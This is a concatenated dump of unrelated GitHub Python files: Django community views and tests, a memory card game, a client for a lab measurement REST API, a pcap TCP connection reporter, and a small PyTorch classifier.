)\n writer.add_scalar(\"loss\", loss_v.item(), iter_no)\n writer.add_scalar(\"reward_bound\", reward_b, iter_no)\n writer.add_scalar(\"reward_mean\", reward_mean, iter_no)\n if reward_mean > 0.7:\n print(\"Solved!\")\n break\n writer.close()\n\n","repo_name":"amareyah/Reinforcement_Learning","sub_path":"code/frozen_lake.py","file_name":"frozen_lake.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40901690329","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST, require_http_methods\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator\nfrom .models import Article, Comment\nfrom .forms import ArticleForm, CommentForm\nfrom django.contrib.auth.decorators import login_required\n\n\ndef index_search(request):\n qs = Post.objects.all().order_by('-id')\n\n q = request.GET.get('q', '')\n if q: \n qs = qs.filter(title__icontains=q)\n paginator = Paginator(qs, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n context = {\n 'articles' : qs,\n 'q' : q,\n 'page_obj' : page_obj,\n }\n\n return render(request, 'community/index.html', context)\n\n\ndef pur_index(request, article_pk):\n if int(article_pk) > 3:\n return redirect('community:index')\n articles = Article.objects.filter(purpose=article_pk).order_by('-id')\n paginator = Paginator(articles, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context = {\n 'articles': articles,\n 'page_obj': page_obj,\n 'article_pk': article_pk,\n }\n return render(request, 'community/index.html', context)\n\n\n@require_GET\ndef index(request):\n articles = Article.objects.order_by('-pk')\n paginator = Paginator(articles, 10)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n context = {\n 'articles': articles,\n 'page_obj': page_obj,\n }\n\n return render(request, 'community/index.html', context)\n\n@require_http_methods(['GET', 'POST'])\ndef create(request):\n if request.method == 'POST':\n form = ArticleForm(request.POST) \n if form.is_valid():\n article = form.save(commit=False)\n article.user = request.user\n article.save()\n return redirect('community:detail', article.pk)\n else:\n form = ArticleForm()\n context = {\n 'form': form,\n }\n return render(request, 'community/create.html', context)\n\n@require_GET\ndef detail(request, article_pk):\n article = get_object_or_404(Article, pk=article_pk)\n comments = article.comment_set.all()\n comment_form = CommentForm()\n context = {\n 'article': article,\n 'comment_form': comment_form,\n 'comments': comments,\n }\n return render(request, 'community/detail.html', context)\n\n\n@require_POST\ndef delete(request, article_pk):\n if request.user.is_authenticated:\n article = get_object_or_404(Article, pk=article_pk)\n if request.user == article.user:\n article.delete()\n return redirect('community:index')\n return redirect('community:detail', article.pk)\n\n\n@require_POST\ndef create_comment(request, article_pk):\n article = get_object_or_404(Article, pk=article_pk)\n comment_form = CommentForm(request.POST)\n if comment_form.is_valid():\n comment = comment_form.save(commit=False)\n comment.article = article\n comment.user = request.user\n comment.save()\n return redirect('community:detail', article.pk)\n context = {\n 'comment_form': comment_form,\n 'article': article,\n 'comments': article.comment_set.all(),\n }\n return render(request, 'community/detail.html', context)\n\n\n\n@require_POST\ndef comments_delete(request, article_pk, comment_pk):\n if request.user.is_authenticated:\n comment = get_object_or_404(Comment, pk=comment_pk)\n if request.user == comment.user:\n comment.delete()\n return redirect('community:detail', article_pk)\n\n\n@login_required\n@require_http_methods(['GET', 'POST'])\ndef update(request, article_pk):\n # article = Article.objects.get(pk=pk)\n article = get_object_or_404(Article, pk=article_pk)\n # 수정하는 유저와, 게시글 작성 유저가 같은지 ?\n if request.user == article.user:\n if request.method == 'POST':\n form = ArticleForm(request.POST, instance=article)\n if form.is_valid():\n form.save()\n return redirect('community:detail', article.pk)\n else:\n form = ArticleForm(instance=article)\n else:\n return redirect('community:index')\n context = {\n 'form': form,\n 'article': article,\n }\n return render(request, 'community/update.html', context)\n\n\n","repo_name":"NoJeong/PROJECT","sub_path":"영화추천사이트/community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35533679664","text":"\n###########\n# Imports #\n###########\n\ntry:\n import simplegui\nexcept ImportError:\n import SimpleGUICS2Pygame.simpleguics2pygame as simplegui\nimport simpleplot\nimport random\n\n#############\n# Variables #\n#############\n\nHEIGHT = 100\nWIDTH = 800\nCARD_HEIGHT = 100\nCARD_WIDTH = 50\nnumber_list = [] # list with the numbers\ndeck = []\nexposed = []\ncool = []\ncard_color = \"#006400\"\ntext_color = \"#006400\"\nTEXT_SIZE = 28 #px\nCARD_LINE_COLOR = \"#FF0000\"\nINIT_STATE = \"unflipped\"\nmoves = 0\n\n####################\n# Helper functions #\n####################\n\n# helper function to initialize globals\ndef init():\n global deck, number_list, card_color, text_color, exposed, cool, moves\n number_list = [range(1,9) for i in range(2)]\n number_list = number_list[0] + number_list[1]\n random.shuffle(number_list) # Everyday I'm shuffeling\n INIT_STATE = \"unflipped\"\n i = 0\n cool = []\n moves = 0\n\n while i < len(number_list):\n text_position = [((i * CARD_WIDTH) + (CARD_WIDTH / 2) -10), CARD_HEIGHT - 40]\n card = [([i*CARD_WIDTH, 0], [(i+1)*CARD_WIDTH, 0], [(i+1)*CARD_WIDTH, CARD_HEIGHT], [i*CARD_WIDTH, CARD_HEIGHT]), 1, CARD_LINE_COLOR, card_color, number_list[i], text_position, text_color, INIT_STATE]\n deck.append(card)\n i += 1\n\ndef checkcard():\n global deck, cool\n for card in deck:\n for c in cool:\n if c == card[4] and card[7] == \"flipped\":\n card[7] = \"exposed\"\n\ndef clean():\n global moves\n for card in deck:\n if card[7] == \"flipped\":\n card[7] = \"unflipped\"\n moves += 1\n\n############\n# Handlers #\n############\n\n# define event handlers\ndef mouseclick(pos):\n global exposed, cool\n for card in deck:\n if ((card[0][0][0] <= pos[0]) and (card[0][1][0] >= pos[0]) and (card[7] == \"unflipped\") and len(exposed) < 2):\n card[3] = \"#000000\"\n card[6] = \"#FFFFFF\"\n card[7] = \"flipped\"\n exposed.append(card[4])\n break\n\n if len(exposed) >= 2:\n exposed = []\n clean()\n break\n\n# cards are logically 50x100 pixels in size\ndef draw(canvas):\n global deck, exposed, cool, moves\n i = 0\n for card in deck:\n canvas.draw_polygon(deck[i][0], deck[i][1], deck[i][2], deck[i][3])\n if len(exposed) == 0:\n card[3] = \"#006400\"\n card[6] = \"#006400\"\n if card[7] == \"exposed\":\n card[3] = \"#000000\"\n card[6] = \"#FFFFFF\"\n canvas.draw_text(str(card[4]), card[5], TEXT_SIZE, card[6])\n i += 1\n\n if len(exposed) == 2 and exposed[0] == exposed[1]:\n cool.append(exposed[0])\n cool.append(exposed[1])\n exposed.pop()\n exposed.pop()\n moves += 1\n\n checkcard()\n l.set_text(\"Moves = \" + str(moves))\n\n######\n# UI #\n######\n\n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", WIDTH, HEIGHT)\nframe.add_button(\"Restart\", init)\nl=frame.add_label(\"Moves = 0\")\n\n########\n# Main #\n########\n\n# initialize global variables\ninit()\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nframe.start()\n","repo_name":"hctnm2/OpenSourceEnthusiast","sub_path":"codes/memory_game.py","file_name":"memory_game.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"40"} +{"seq_id":"7759803505","text":"import urllib.parse\n\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\nclass EhvaApi:\n \"\"\"EHVA API class. performs requests to the EHVA REST server\"\"\"\n\n API_URL = \"api/v1\"\n\n def __init__(self, host_url, api_key):\n\n self.host_url = host_url\n self.base_url = urllib.parse.urljoin(host_url, self.API_URL)\n self.api_key = api_key\n self.request_headers = {\"ApiKey\": self.api_key}\n\n def __repr__(self):\n return f\"EhvaApi hosted on {self.host_url}\"\n\n def request_wrapper(func):\n \"\"\"This is a wrapper to perform the requests and assess their success\"\"\"\n\n def f(*args, **kwargs):\n try:\n response = func(*args, **kwargs)\n\n if response.ok:\n return response.json()\n else:\n return f\"{response.reason}: {response.text}\"\n\n except Exception as ex:\n raise ConnectionError(ex)\n\n return f\n\n @request_wrapper\n def _perform_get(self, route, params=None):\n return requests.get(\n self.base_url + route,\n params=params,\n headers=self.request_headers,\n verify=False,\n )\n\n @request_wrapper\n def _perform_post(self, route, params=None, data=None):\n return requests.post(\n self.base_url + route,\n params=params,\n headers=self.request_headers,\n data=data,\n verify=False,\n )\n\n @property\n def wafers(self):\n \"\"\"Returns a list of all wafers\"\"\"\n return self._perform_get(\"/components/wafers\")\n\n @property\n def reticles(self):\n \"\"\"Returns a list of all reticles\"\"\"\n return self._perform_get(\"/components/reticles\")\n\n @property\n def dies(self):\n \"\"\"Returns a list of all dies\"\"\"\n return self._perform_get(\"/components/dies\")\n\n @property\n def circuits(self):\n \"\"\"Returns a list of all circuits\"\"\"\n return self._perform_get(\"/components/circuits\")\n\n @property\n def optical_ports(self):\n \"\"\"Returns a list of all optical ports\"\"\"\n return self._perform_get(\"/components/opticalports\")\n\n @property\n def electrical_ports(self):\n \"\"\"Returns a list of all electrical ports\"\"\"\n return self._perform_get(\"/components/electricalports\")\n\n @property\n def station_configurations(self):\n \"\"\"Returns a list of all station configs\"\"\"\n return self._perform_get(\"/stationconfigurations\")\n\n @property\n def measurement_sequences(self):\n \"\"\"Returns a list of all measurement sequences\"\"\"\n return self._perform_get(\"/measurementsequences\")\n\n def run_sequence(\n self,\n sequence_name,\n sequence_version,\n station_config: dict = None,\n dut: dict = None,\n debug_mode=False,\n nosave_mode=False,\n ):\n \"\"\"Run an existing Measurement Sequence\n\n Args:\n sequence_name (str): Name of the Sequence to be run\n sequence_version (str): Version of the sequence to be run\n station_config (dict, optional): The Station Config to be used. Must be a dict with string fields 'name' and 'version'.\n dut (dict, optional): Device Under Test to be used. Must be a dict containing fields 'wafer', 'reticle', 'die', 'circuit', 'optical port', 'electrical port'.\n debug_mode (bool, optional): Whether to run in debug (slowed-down) mode.\n nosave_mode (bool, optional): Whether to prevent saving to database. Useful for testing and debugging.\n\n Returns:\n dict: A dictionary containing all Sequence Variables in the form (Name, Value).\n \"\"\"\n\n # Verify Measurement Sequence\n matching_sequence = [\n s\n for s in self.measurement_sequences\n if s[\"name\"] == sequence_name and s[\"version\"] == sequence_version\n ]\n if not matching_sequence:\n raise ValueError(\n f\"The Measurement Sequence with name '{sequence_name}' and version '{sequence_version}' could not be found.\"\n )\n sequence_id = matching_sequence[0][\"id\"]\n\n # Make Station config verifications\n config_id = None\n if station_config is not None:\n if any(key not in station_config for key in [\"name\", \"version\"]):\n raise ValueError(\n \"argument station_config must contain 'name' and 'version' fields.\"\n )\n\n config = [\n c\n for c in self.station_configurations\n if c[\"name\"] == station_config[\"name\"]\n and c[\"version\"] == station_config[\"version\"]\n ]\n if not config:\n raise ValueError(\n f\"Station Config with name '{station_config['name']}' and version '{station_config['version']}' was not found.\"\n )\n config_id = config[0][\"id\"]\n\n # Make DUT verifications\n optical_port_id = None\n electrical_port_id = None\n if dut is not None and (\n dut[\"optical port\"] is not None or dut[\"electrical port\"] is not None\n ):\n\n if any(\n key\n not in [\n \"wafer\",\n \"reticle\",\n \"die\",\n \"circuit\",\n \"optical port\",\n \"electrical port\",\n ]\n for key in dut\n ):\n raise ValueError(\n \"argument 'dut' must contain the following fields: 'wafer', 'reticle', 'die', 'circuit', 'optical port', 'electrical port'.\"\n )\n\n try:\n wafer = [w for w in self.wafers if w[\"name\"] == dut[\"wafer\"]][0]\n reticle = [\n r\n for r in self.reticles\n if r[\"name\"] == dut[\"reticle\"] and r[\"waferId\"] == wafer[\"id\"]\n ][0]\n die = [\n d\n for d in self.dies\n if d[\"name\"] == dut[\"die\"] and d[\"reticleId\"] == reticle[\"id\"]\n ][0]\n circuit = [\n c\n for c in self.circuits\n if c[\"name\"] == dut[\"circuit\"] and c[\"dieId\"] == die[\"id\"]\n ][0]\n optical_port_id = [\n p[\"id\"]\n for p in self.optical_ports\n if p[\"name\"] == dut[\"optical port\"]\n and p[\"componentId\"] == circuit[\"id\"]\n ]\n electrical_port_id = [\n p[\"id\"]\n for p in self.electrical_ports\n if p[\"name\"] == dut[\"electrical port\"]\n and p[\"componentId\"] == circuit[\"id\"]\n ]\n\n except Exception:\n raise ValueError(\n f\"The provided DUT could not be found, please review hierarchy: {dut}.\"\n )\n\n # Perform request\n params = {\n \"sequenceId\": sequence_id,\n \"stationConfigurationId\": config_id,\n \"opticalPortsId\": optical_port_id,\n \"electricalPortsId\": electrical_port_id,\n \"isDebugMode\": debug_mode,\n \"isNoSaveMode\": nosave_mode,\n }\n\n return self._perform_get(\"/runtime/runexisting\", params=params)\n","repo_name":"EHVAAutomation/ehva-python","sub_path":"ehva/ehva_api.py","file_name":"ehva_api.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"16544337510","text":"import dpkt\nimport socket\nimport datetime\nimport argparse\n\n# Defines a unique key representing a set of (ip:port,ip:port)\ndef getConnectionKey(source_port, dest_port, source_ip, dest_ip):\n connection_key = \"\"\n if(source_ip < dest_ip):\n connection_key += source_ip + \":\"\n connection_key += str(source_port) + \":\"\n connection_key += dest_ip + \":\"\n connection_key += str(dest_port)\n else:\n connection_key += dest_ip + \":\"\n connection_key += str(dest_port) + \":\"\n connection_key += source_ip + \":\"\n connection_key += str(source_port)\n return connection_key\n\ndef reportFromCapFile(filename):\n f = open(filename, 'rb')\n pcap = dpkt.pcap.Reader(f)\n\n connections = {}\n\n for ts, buf in pcap:\n # go down the layers of the network stack\n ethernet_obj = dpkt.ethernet.Ethernet(buf)\n ip_obj = ethernet_obj.data\n tcp_obj = ip_obj.data\n\n source_port = tcp_obj.sport\n dest_port = tcp_obj.dport\n\n source_ip = socket.inet_ntoa(ip_obj.src)\n dest_ip = socket.inet_ntoa(ip_obj.dst)\n\n num_data_bytes = len(tcp_obj.data)\n\n seq_num = tcp_obj.seq\n ack_num = tcp_obj.ack\n\n recv_window_size = tcp_obj.win\n\n # connection data needed for a packet\n connection_data = {\n 'ts' : ts,\n 'source_port' : source_port,\n 'dest_port' : dest_port,\n 'source_ip' : source_ip,\n 'dest_ip' : dest_ip,\n 'flags' : tcp_obj.flags,\n 'data_bytes' : num_data_bytes,\n 'seq_num' : seq_num,\n 'ack_num' : ack_num,\n 'recv_window_size' : recv_window_size\n }\n connection_key = getConnectionKey(source_port, dest_port, source_ip, dest_ip)\n\n # sort packets into dictionary where each value is a list of packets\n if(connection_key not in connections):\n connections[connection_key] = []\n connections[connection_key].append(connection_data)\n\n num_connections = len(connections)\n\n counter = 1\n complete_connections = 0\n reset_connections = 0\n\n max_complete_time = 0\n min_complete_time = 10000000.0\n complete_time_sum = 0\n\n max_rtt = 0\n min_rtt = 100000000.0\n rtt_sum = 0\n rtt_count = 0\n\n max_packet_count = 0\n min_packet_count = 10000000.0\n packet_count_sum = 0\n\n max_recv = 0\n min_recv = 100000000.0\n recv_sum = 0\n recv_count = 0\n\n # loop over connections and then packets in each connection\n for key, packets in connections.items():\n print(\"==============================================================\")\n print(\"Connection \", counter)\n counter += 1\n\n syn_count = 0\n fin_count = 0\n rst_count = 0\n for packet in packets:\n flags = packet['flags']\n syn_flag = ( flags & dpkt.tcp.TH_SYN ) != 0\n fin_flag = ( flags & dpkt.tcp.TH_FIN ) != 0\n ack_flag = ( flags & dpkt.tcp.TH_ACK ) != 0\n rst_flag = ( flags & dpkt.tcp.TH_RST ) != 0\n\n if(syn_flag):\n syn_count += 1\n if(fin_flag):\n fin_count += 1\n if(rst_flag):\n rst_count += 1\n\n rst_str = \"\"\n if(rst_count > 0):\n rst_str = \"/R\"\n reset_connections += 1\n print(\"Connection state: \", \"S\", syn_count, \"F\", fin_count, rst_str)\n\n\n connection_complete = (syn_count > 0 and fin_count > 0)\n if not connection_complete:\n print(\"Connection not complete\")\n continue\n\n complete_connections += 1\n print(\"Connection is complete\")\n\n first_syn_i = 0\n last_fin_i = -1\n for i in range(0,len(packets)):\n packet = packets[i]\n flags = packet['flags']\n syn_flag = ( flags & dpkt.tcp.TH_SYN ) != 0\n if(syn_flag):\n first_syn_i = i\n break\n\n for i in reversed(range(0,len(packets))):\n packet = packets[i]\n flags = packet['flags']\n fin_flag = ( flags & dpkt.tcp.TH_FIN ) != 0\n if(fin_flag):\n last_fin_i = i\n break\n\n start_time = packets[first_syn_i]['ts']\n end_time = packets[last_fin_i]['ts']\n duration = end_time - start_time\n print(\"Starting time: \", datetime.datetime.utcfromtimestamp(start_time))\n print(\"Ending time: \", datetime.datetime.utcfromtimestamp(end_time))\n print(\"Duration: \", duration, \"seconds\")\n\n max_complete_time = max(duration, max_complete_time)\n min_complete_time = min(duration, min_complete_time)\n complete_time_sum += duration\n\n # ip of the first packet, so we can sort into (this ip) and (not this ip)\n first_ip = packets[0]['source_ip']\n # other info\n first_port = packets[0]['source_port']\n other_ip = packets[0]['dest_ip']\n other_port = packets[0]['dest_port']\n\n packet_count = len(packets)\n\n max_packet_count = max(max_packet_count, packet_count)\n min_packet_count = min(min_packet_count, packet_count)\n packet_count_sum += packet_count\n\n # Calculate how many packets go in each direction\n first_count = 0\n first_data_bytes = 0\n other_data_bytes = 0\n for packet in packets:\n if packet['source_ip'] == first_ip:\n first_count += 1\n first_data_bytes += packet['data_bytes']\n else:\n other_data_bytes += packet['data_bytes']\n\n other_count = packet_count - first_count\n print(\"Packets sent from\",\n first_ip + \":\" + str(first_port),\n \"to\",\n other_ip + \":\" + str(other_port),\n \":\", first_count)\n print(\"Packets sent from\",\n other_ip + \":\" + str(other_port),\n \"to\",\n first_ip + \":\" + str(first_port),\n \":\", other_count)\n print(\"Total packet count: \", packet_count);\n\n print(\"Data bytes sent from\",\n first_ip + \":\" + str(first_port),\n \"to\",\n other_ip + \":\" + str(other_port),\n \":\", first_data_bytes)\n print(\"Data bytes sent from\",\n other_ip + \":\" + str(other_port),\n \"to\",\n first_ip + \":\" + str(first_port),\n \":\", other_data_bytes)\n print(\"Total data bytes: \", first_data_bytes + other_data_bytes);\n\n # map of ack number to ts\n packet_openings = {}\n for packet in packets:\n seq_num = packet['seq_num']\n ack_num = packet['ack_num']\n data_bytes = packet['data_bytes']\n ts = packet['ts']\n packet_openings[seq_num + data_bytes] = ts\n if ack_num in packet_openings:\n rtt_time = ts - packet_openings[ack_num]\n rtt_count += 1\n rtt_sum += rtt_time\n max_rtt = max(max_rtt, rtt_time)\n min_rtt = min(min_rtt, rtt_time)\n # print(\"RTT time: \", rtt_time)\n del packet_openings[ack_num]\n\n for packet in packets:\n recv = packet['recv_window_size']\n recv_count += 1\n recv_sum += recv\n min_recv = min(recv, min_recv)\n max_recv = max(recv, max_recv)\n\n print(\"---------------------------------------------\")\n print(\"Total connections: \", num_connections)\n print(\"Number of complete connections: \", complete_connections)\n print(\"Number of reset connections: \", reset_connections)\n print(\"Number of connections still open: \", num_connections - complete_connections)\n\n mean_complete_time = complete_time_sum / complete_connections\n print(\"Max time open for a complete connection: \", max_complete_time)\n print(\"Min time open for a complete connection: \", min_complete_time)\n print(\"Mean time open for complete connections: \", mean_complete_time)\n\n mean_rtt = rtt_sum / rtt_count\n print(\"Max Round Trip Time: \", max_rtt)\n print(\"Min Round Trip Time: \", min_rtt)\n print(\"Mean Round Trip Time: \", mean_rtt)\n\n mean_packet_count = packet_count_sum / complete_connections\n print(\"Max packet count a complete connection: \", max_packet_count)\n print(\"Min packet count a complete connection: \", min_packet_count)\n print(\"Mean packet count for complete connections: \", mean_packet_count)\n\n mean_recv = recv_sum / recv_count\n print(\"Max recv window size: \", max_recv)\n print(\"Min recv window size: \", min_recv)\n print(\"Mean recv window size: \", mean_recv)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Read a cap file and report details of the connections')\n parser.add_argument('filename')\n args = parser.parse_args()\n filename = args.filename\n\n reportFromCapFile(filename)\n","repo_name":"mapld/CSC361","sub_path":"Assign2/CapReport.py","file_name":"CapReport.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19926318493","text":"import numpy as np\r\nimport torch\r\nimport matplotlib.pyplot as plt\r\n\r\n# prepare dataset\r\nxy = np.loadtxt('diabetes.csv', delimiter=',', dtype=np.float32) #delimiter指分隔符逗号;dtype指数据类型,NN常用32(多数显卡支持)\r\nx_data = torch.from_numpy(xy[:, :-1]) # 第一个‘:’是指读取所有行,第二个‘:’是指从第一列��始,最后一列不要\r\nprint(\"input data.shape\", x_data.shape)\r\ny_data = torch.from_numpy(xy[:, [-1]]) # [-1]的中括号使得最后得到的是个矩阵;没有中括号的话就是一个向量\r\n\r\n\r\n# print(x_data.shape)\r\n# design model using class\r\n\r\n\r\nclass Model(torch.nn.Module):\r\n def __init__(self):\r\n super(Model, self).__init__()\r\n self.linear1 = torch.nn.Linear(8, 6) #矩阵实际上就是不同维度空间之间的一个线性变换,或者说是映射。把8维->6维。sigmoid实现非线性\r\n self.linear2 = torch.nn.Linear(6, 4)\r\n self.linear3 = torch.nn.Linear(4, 2)\r\n self.linear4 = torch.nn.Linear(2, 1)\r\n self.sigmoid = torch.nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n x = self.sigmoid(self.linear1(x))\r\n x = self.sigmoid(self.linear2(x))\r\n x = self.sigmoid(self.linear3(x))\r\n x = self.sigmoid(self.linear4(x)) # y hat\r\n return x\r\n\r\n\r\nmodel = Model()\r\n\r\n# construct loss and optimizer\r\n# criterion = torch.nn.BCELoss(size_average = True)\r\ncriterion = torch.nn.BCELoss(reduction='mean')\r\noptimizer = torch.optim.SGD(model.parameters(), lr=0.1)\r\n\r\nepoch_list = []\r\nloss_list = []\r\n# training cycle forward, backward, update\r\nfor epoch in range(1000000): #此处没有用mini-batch\r\n y_pred = model(x_data)\r\n loss = criterion(y_pred, y_data)\r\n # print(epoch, loss.item())\r\n\r\n epoch_list.append(epoch)\r\n loss_list.append(loss.item())\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if epoch % 100000 == 99999:\r\n y_pred_label = torch.where(y_pred >= 0.5, torch.tensor([1.0]), torch.tensor([0.0]))\r\n\r\n acc = torch.eq(y_pred_label, y_data).sum().item() / y_data.size(0)\r\n print(\"loss = \", loss.item(), \"acc = \", acc)\r\n\r\n\r\nplt.plot(epoch_list, loss_list)\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.show()\r\n","repo_name":"rainbowlzx/lizixuan_graduation-design","sub_path":"11.8-11.14/Lesson7处理多维特征输入.py","file_name":"Lesson7处理多维特征输入.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28737817082","text":"from io import BytesIO\n\nimport pytest\nfrom django.conf import settings\n# from background_task.tasks import tasks\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.flatpages.models import FlatPage\n\nfrom portal import models\nfrom portal.models import Ethnicity, Profile, Subscription\n\npytestmark = pytest.mark.django_db\n\nUser = get_user_model()\n\n\ndef test_template_views(client, admin_user):\n resp = client.get(\"/\")\n assert resp.status_code == 302\n\n fp, _ = FlatPage.objects.get_or_create(\n title=\"About (en)\", url=\"/en/about/\", content=\"THIS IS EN ABOUT PAGE\"\n )\n fp.sites.add(settings.SITE_ID)\n fp.save()\n\n resp = client.get(\"/pages/en/about/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/pages/about/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/about\")\n assert resp.status_code == 200\n\n resp = client.get(\"/accounts/login/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/accounts/signup/\")\n assert resp.status_code == 200\n\n client.force_login(admin_user)\n resp = client.get(\"/\")\n assert resp.status_code == 302\n\n resp = client.get(\"/\", follow=True)\n assert (\n b\"Your profile is not completed yet. Please complete your profile or skip it.\"\n in resp.content\n )\n\n Profile.create(user=admin_user, is_completed=True)\n\n resp = client.get(\"/\")\n assert resp.status_code == 200\n\n resp = client.get(\"/onboard\")\n assert resp.status_code == 302\n\n\n# def test_submit_task(client):\n# username, password = \"tester\", \"p455w0rd\"\n# user = User.objects.create_user(username=username, password=password)\n# client.force_login(user)\n# client.get(\"/test_task/TEST-MESSAGE\")\n# assert tasks.run_next_task()\n\n\ndef test_profile(client, admin_user):\n\n username, password = \"tester\", \"p455w0rd\"\n user = User.objects.create_user(username=username, password=password)\n client.force_login(user)\n\n Ethnicity.objects.create(code=\"11111\", description=\"New Zealand European\")\n Ethnicity.objects.create(code=\"12411\", description=\"Polish\")\n Ethnicity.objects.create(code=\"12928\", description=\"Latvian\")\n assert not Profile.objects.filter(user=user).exists()\n resp = client.get(\"/myprofile\", follow=True)\n assert b\"Next\" in resp.content\n\n p = Profile.create(user=user)\n resp = client.get(\"/myprofile\", follow=True)\n assert b\"Primary Language Spoken\" in resp.content\n assert b\"Edit\" in resp.content\n p = Profile.get(user=user)\n assert p.gender == 0 and p.ethnicities.count() == 0\n\n resp = client.post(\n \"/profile/~update\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n education_level=\"7\",\n employment_status=\"3\",\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert b\"Please read and consent to the Privacy Policy\" in resp.content\n\n models.IwiGroup.create(\n code=\"1111\",\n description=\"TEST\",\n parent_code=\"11\",\n parent_description=\"TEST\",\n definition=\"TEST\",\n )\n resp = client.post(\n \"/profile/~update\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n iwi_groups=[\"1111\"],\n education_level=\"7\",\n employment_status=\"3\",\n is_accepted=True,\n ),\n follow=True,\n )\n assert resp.status_code == 200\n p = Profile.get(user=user)\n assert p.gender == 1 and p.ethnicities.count() == 1\n\n client.force_login(admin_user)\n resp = client.get(f\"/profiles/{user.profile.pk}\")\n assert resp.status_code == 200\n resp = client.get(f\"/profiles/{user.pk}\")\n assert resp.status_code == 404\n\n resp = client.post(\n \"/profile/~create\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n education_level=\"7\",\n employment_status=\"3\",\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert Profile.objects.filter(user=admin_user).count() == 0\n assert b\"consent\" in resp.content\n\n resp = client.post(\n \"/profile/~create\",\n dict(\n gender=1,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\"],\n education_level=\"7\",\n employment_status=\"3\",\n is_accepted=True,\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert admin_user.profile.ethnicities.count() == 1\n\n resp = client.post(\n \"/profile/~update\",\n dict(\n gender=2,\n date_of_birth=\"1969-01-01\",\n ethnicities=[\"11111\", \"12411\", \"12928\"],\n education_level=\"7\",\n employment_status=\"3\",\n is_accepted=True,\n ),\n follow=True,\n )\n assert resp.status_code == 200\n assert b\"Position\" in resp.content\n\n # Employments:\n org = models.Organisation.create(name=\"ORG\")\n resp = client.get(\"/profile/employments/\")\n assert not models.Affiliation.where(type=\"EMP\", profile=p).exists()\n resp = client.post(\n \"/profile/employments/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-org\": org.id,\n \"form-0-type\": \"EMP\",\n \"form-0-role\": \"ROLE\",\n \"form-0-start_date\": \"2020-05-02\",\n \"form-0-end_date\": \"\",\n \"form-0-id\": \"\",\n \"save\": \"Save\",\n },\n follow=True,\n )\n assert models.Affiliation.where(type=\"EMP\", profile=p).exists()\n\n p = admin_user.profile\n assert p.gender == 1 and p.ethnicities.count() == 3\n assert p.ethnicities.count() == 3\n\n # Create and update career stages\n models.CareerStage.create(code=\"R1\", description=\"description #1\", definition=\"definition #1\")\n resp = client.get(\"/profile/career-stages/\")\n assert not models.ProfileCareerStage.where(profile=p).exists()\n resp = client.post(\n \"/profile/career-stages/\",\n {\n \"form-TOTAL_FORMS\": 1,\n \"form-INITIAL_FORMS\": 0,\n \"form-0-profile\": p.id,\n \"form-0-year_achieved\": 2000,\n \"form-0-career_stage\": \"R1\",\n \"form-0-id\": \"\",\n \"save\": \"Save\",\n },\n follow=True,\n )\n assert models.ProfileCareerStage.where(profile=p).exists()\n\n pcs = models.ProfileCareerStage.get(profile=p)\n resp = client.post(\n \"/profile/career-stages/\",\n {\n \"form-TOTAL_FORMS\": 2,\n \"form-INITIAL_FORMS\": 1,\n \"form-0-profile\": p.id,\n \"form-0-year_achieved\": 2003,\n \"form-0-career_stage\": \"R1\",\n \"form-0-id\": pcs.id,\n \"form-1-profile\": p.id,\n \"form-1-year_achieved\": \"\",\n \"form-1-career_stage\": \"\",\n \"form-1-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert models.ProfileCareerStage.where(profile=p, year_achieved=2003).exists()\n\n resp = client.post(\n \"/profile/career-stages/\",\n {\n \"form-TOTAL_FORMS\": 2,\n \"form-INITIAL_FORMS\": 1,\n \"form-0-profile\": p.id,\n \"form-0-year_achieved\": 2003,\n \"form-0-career_stage\": \"R1\",\n \"form-0-id\": pcs.id,\n \"form-0-DELETE\": \"on\",\n \"form-1-profile\": p.id,\n \"form-1-year_achieved\": \"\",\n \"form-1-career_stage\": \"\",\n \"form-1-id\": \"\",\n \"next\": \"Next\",\n },\n follow=True,\n )\n assert not models.ProfileCareerStage.where(profile=p, year_achieved=2003).exists()\n\n # Profile identifier:\n 